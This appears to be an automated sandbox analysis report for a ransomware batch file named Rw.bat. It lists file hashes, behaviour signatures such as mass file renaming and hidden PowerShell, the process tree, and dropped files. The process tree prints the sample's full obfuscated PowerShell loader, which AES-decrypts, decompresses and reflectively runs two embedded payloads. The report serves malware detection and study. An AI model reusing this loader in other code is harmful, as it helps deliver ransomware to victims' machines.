Overview

overview

9

Static

static

1

Rw.bat

windows10-1703-x64

9

Rw.bat

windows10-2004-x64

9

Analysis

  • max time kernel
    79s
  • max time network
    81s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    29/05/2024, 22:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Rw.bat

  • Size

    147KB

  • MD5

    10c8b7129e1a635179caf78a2ede32bb

  • SHA1

    dcf8e8ab91d40c68d77526f5c30208c7ac21a093

  • SHA256

    a18bdffc5da96ddd4ebdd0abd6c82c0c4f9b7ce4bb1aaf7ddcf1485e12bb3d7d

  • SHA512

    6559ac3df1144e60c0a857870b4fd9056a0df20c8c950e510ce77d0c8cfbad3b92200847331598e091d954edff7b0852fbeabca001985d5e25f88374bda743d4

  • SSDEEP

    3072:/CsnrjLdUHATGi3jncpwQAn/WyEhS2ih8AhVb9f+0JcF70LGQGlSlo:/9rjLdUgTGqnc2Q4/+S2qRoF7cq

Score
9/10
executionransomware

Malware Config

Signatures

  • Renames multiple (888) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rw.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dJjJ6VkchB27v8EvDwLjmbBMPZ3pHzcp0UxSgGzvIcQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fQa1B+mE7Ft7ReW23sIeqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dVTce=New-Object System.IO.MemoryStream(,$param_var); $pYzfN=New-Object System.IO.MemoryStream; $vwLdH=New-Object System.IO.Compression.GZipStream($dVTce, [IO.Compression.CompressionMode]::Decompress); $vwLdH.CopyTo($pYzfN); $vwLdH.Dispose(); $dVTce.Dispose(); $pYzfN.Dispose(); $pYzfN.ToArray();}function execute_function($param_var,$param2_var){ $IzebR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $nVpxY=$IzebR.EntryPoint; $nVpxY.Invoke($null, $param2_var);}$VxPjU = 'C:\Users\Admin\AppData\Local\Temp\Rw.bat';$host.UI.RawUI.WindowTitle = $VxPjU;$wBCxF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VxPjU).Split([Environment]::NewLine);foreach ($cOVNK in $wBCxF) { if ($cOVNK.StartsWith('oJTRUUBLZUACjdHTansI')) { $BJBrT=$cOVNK.Substring(20); break; }}$payloads_var=[string[]]$BJBrT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:1308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:592

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USStmp.jtx
      Filesize

      3.0MB

      MD5

      0b5b52c65648d1f30261ba61a76231e3

      SHA1

      3d5cad7afb56d46493f2e7dd0477bfdfd22c4422

      SHA256

      0ad6bfdb69253c28e53e833e3d729deec27e1b294dc470af75b18991bcd36244

      SHA512

      9ffaf9192ccc24292e711d7440d88652b336b044f6605020fcec45c40606e7a92fd1eb7cd4403cf6fcefa9110d216c9192e5af6e5b3f76828b67ca562a665e46

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT
      Filesize

      16B

      MD5

      8f2a2b863d74e614411ae5ad24a3cdf5

      SHA1

      3fd04c1ac6a40c2854bbcb1f36241f9b7abc7dab

      SHA256

      288a1a8dd396390df0a60ce7bc4d5be368dd4b060babc92ecfc2efebd0155812

      SHA512

      b900c83844215b66cd7a65dbf8f8377183f39386ac59f74175d1347743aa461edb6b3287a929da6e7bc7c297ba2f5764a2b9f1ffc897c3ee3f50571476be7555

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001
      Filesize

      41B

      MD5

      2bf00f9e96c33c412cbdd7243cf4046e

      SHA1

      b219a779453980fe2d51fce93a8a7f0f3e5ca168

      SHA256

      cca6fd1b2cb134e1ef4b38e51dfbd9b3ca7de64a4efb37d88b6d15b8665cc6b7

      SHA512

      cab953677aa91cbab6ce3b866e27be92cda8c7700775b99cfce601252c04a41e243befb024a204d1d73797b19b08cdfa4462fd47ea1ce9ae115b3cb6ce7a70ab

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2
      Filesize

      8KB

      MD5

      bf4f728f24bec26f35b1661044695e7b

      SHA1

      97bd077cc5605013b751f9c910095efb438c7fe4

      SHA256

      c909d03d9c5fa2bde201e0b7fa5329bcc0e6dfe1a51a17bb51fd188e00acdd22

      SHA512

      603c1095fec3121033a1cf5690e7c0efa36139759ec5136221bb299d6ac75493e8d24ac51d99cd4b2ad0f6f6555196887ecd7efd946aa43a99e96ba7f633ef23

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index
      Filesize

      24B

      MD5

      f8fda90eec54cc4f87a5d50606f8ab50

      SHA1

      2b6a89801011ef3a1353ac07d5e457b41e74eb92

      SHA256

      9647e64e29f2219ac428b4d4159906628f9c802bdb219656eea723c144e3f232

      SHA512

      a486ec0deaaa8765a2dd593b3d9e8dc47e85d4390113e9aa12e69877c1f2cf25f4a56c58d4a824cf633f36cf066cd0e82974578f6bb484f51c5b6841d0f9cb90

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_0
      Filesize

      8KB

      MD5

      f6703e9f640802cb3c48654f29e71993

      SHA1

      d6f3fae1784ac8a74251f0d45ab0ae99e3220022

      SHA256

      66f52e21265141fea152824e8af9470ae46e75acf7d42e46fba43c90794c2f61

      SHA512

      6697ba36ba134a446bb4881e1135138ccba08b2939379d17605927219fc6067f65a79396593c42ad0a4b6e1b0e9217096ea3dbdffad16382f27a05e4f9e7a092

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_1
      Filesize

      264KB

      MD5

      be610b2651dac081687b00cfa97859b7

      SHA1

      08c2c87ce77e429f27d667e0dd5b45c8c5f4f516

      SHA256

      107e7d0c8b10056763c653ccaea75c2e1c7e1dde4b465467b0c6fdadf0080f46

      SHA512

      4cde5dcb6744f07a03cd62bea4d980c5bffce519f54e061eaac53fa7ee7f7521c2fe7ddcce9841077b297c21a0e629c27468ff84190436d17f89b0784f8b7031

      Download Submit

    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\data_3
      Filesize

      8KB

      MD5

      d0084cb0adb7b33ea6209e82cf28f228

      SHA1

      2e7dd6c6546bb68c985aee6de3a88bfc1a72c7ef

      SHA256

      6b7e12aea78fcd33c8d4814307e746eb5c7409453caae7bce3810aefc148d0f3

      SHA512

      4348cbc37fc4f48866c22d32ceb7808138903db01178fa7382f71868e38a10b033555213aa2368dc20644ea3f79ab679c0a550ef1875a0479bc409e3e9e6da35

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\CortanaListenUIApp_cw5n1h2txyewy\Settings\settings.dat
      Filesize

      8KB

      MD5

      46e781733b49e69da06da09c3485c13c

      SHA1

      6891d4e80b33a7337ceabdc6f332c7b086bd9ed6

      SHA256

      44fb5a9b9a1200cbef49098a84e297e12ebdbda45a171d885848c7e8cef0a364

      SHA512

      f40254f3360317863c2cff51fd66b284653eacc79fde3b22635e11f5bc6be28dc6b78383e61f236f3b3130ff8e05970dbf8aa54a9c34436e484fc1157b29d98f

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9597296c-0283-46d9-b6d1-b50ff9d3051b}\0.1.filtertrie.intermediate.txt
      Filesize

      5B

      MD5

      f3e8d5cf6ba00e7456e4795f68a0c73a

      SHA1

      f235ba9720c32c57f742b8018c919379303a31da

      SHA256

      2bb4486905840c864dcc0595e18b56b29a6043107f6a68bfb0ea7f229fef0789

      SHA512

      05ade0cbf216f2e616a0c2035709c5b5648e36b7b5d442284a35d9171a60cabba4b1f885d008441540fc26722e5d8652bef5a4c671697f6bb5c1dfa471944bcb

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9597296c-0283-46d9-b6d1-b50ff9d3051b}\0.2.filtertrie.intermediate.txt
      Filesize

      5B

      MD5

      23be96859710816f818ee85eb5ae4ef9

      SHA1

      e43900d1e843aa9fa809a9973386b30c28471690

      SHA256

      ad800c7f5ede95b673e2e35e1065aa128e657ebbd1e8f154176fc3a951057848

      SHA512

      fd5663d9d8acc6355626d635b45c50344e2ce890440b785b9a3c82633b4dd4a6724a3fc6d4af90366dffe1f119e52971236aa405eca24f0eb449b4799c04e8b2

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9597296c-0283-46d9-b6d1-b50ff9d3051b}\Apps.index
      Filesize

      101KB

      MD5

      860ad3173134671b12d7733a783eaa44

      SHA1

      15adbc04851a557f18b53c7ba4e12eb8b547a2c4

      SHA256

      3195343bd58fdbee30699a76b44a6047ae371469bbdb6b2e0c733be0d698d702

      SHA512

      2ab18c3f668fcc208041f46e280f36b836347313e606e39aeacce0463a4e0b7d5fc9650319672063b95845e09ec5f1bac1224c7eade104c5d517351a63380398

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133567066346427719.txt
      Filesize

      85KB

      MD5

      1b4973335a8b25f1e22ebe68a68c7ccc

      SHA1

      43c1e0907cfc370cb0b9ebcb02bac1972a45005e

      SHA256

      25023b09541b20c318369f53acb52a8ac8e658f16d3c6e7a308efe15cb65fe73

      SHA512

      601df60967ca03c9adcc6970922beb4899bf542de1c88b3f180e66526035ead265bf9d4a4ba624dd573d1bac57a45b16ee95995145fcd30d5dd66b52d49eb86b

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133567067153151571.txt
      Filesize

      66KB

      MD5

      ec3c29b3e5a8828ebd12ae357a29f8fe

      SHA1

      d5da2c33ea917a3633edc599d1b1c9b15ba0c5a6

      SHA256

      ecd39b37264d6090560ad106bc8e9c076180a5a38785ec69c49ae9bac4f5a037

      SHA512

      cacae451d1b9fd5cbf0b241169e8caae343e0feb11095e5a66a3790410813b825cb2385371f926801931e6f275c0abbddc1488c0ebbeae21555649d870727465

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_auwa3u42.wc0.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp965F.tmp
      Filesize

      17.0MB

      MD5

      66e80af1c0a1c320259b329dfaf2ffea

      SHA1

      867eb41115ac8af3ad82ed6e4e3b8c5c3c0cbe4a

      SHA256

      8cdf4c2bf1e5ce6ae70c50b2ca64ec875c552e20b5549df56ce0ed8b8482250c

      SHA512

      a50939dc1e661d98aa0bc19d6eaba1a59f4b8482e0911f9dcee8fdfd08c039817893ff8f48415e9a4a317d0d331ade3a253aabfc423db6f159c878e685699728

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
      Filesize

      48KB

      MD5

      b7f8f4ff37d942d2ab6a1d723f3eb770

      SHA1

      f280d0a6054cf5bb7ce04ac26b81c415c55b6fb2

      SHA256

      130db05cd00c086ee91026ab02768a27b14c261c7226de897927364c1be25361

      SHA512

      e8d40bec52f21779a9a331dd06a903e9b6e5207e726bdbae89a3f6ab823fad763cd31cedd0d811fc4adac1981c29aa92da64b3ca1fcaf5046f69ba5f12369ff2

      Download Submit

    • C:\vcredist2010_x86.log.html
      Filesize

      81KB

      MD5

      9cedb1cab2bd5141e7e7da1966d2f5ae

      SHA1

      91b0cde6229b856ca6502216a62ce6c9ee1d2ebd

      SHA256

      5a5082fd96f9608ba3b73602023694cde7fe5bbe7e33faff7184abe86ae3a395

      SHA512

      2925ff8d9a6e3fdd4c7a5d268365f8c41b816381a27c2fe6dfb25107cc540a31dd8aaa11a6fd2ccec57115ac6bd39de3fb0bf9ce0a2a3b839b902ec1ca542fa7

      Download Submit

    • memory/592-56-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-90-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-23-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-47-0x000001F3B2140000-0x000001F3B21B6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/592-8-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-5-0x000001F3B1B20000-0x000001F3B1B42000-memory.dmp

      Filesize

      136KB

      Download

    • memory/592-0-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

      Filesize

      4KB

      Download

    • memory/592-36-0x000001F3B1CB0000-0x000001F3B1CEC000-memory.dmp

      Filesize

      240KB

      Download

    • memory/592-57-0x000001F3B1CA0000-0x000001F3B1CA8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/592-58-0x000001F3B1CF0000-0x000001F3B1D0E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/592-60-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-89-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-1613-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-1615-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/592-1617-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

      Filesize

      9.9MB

      Download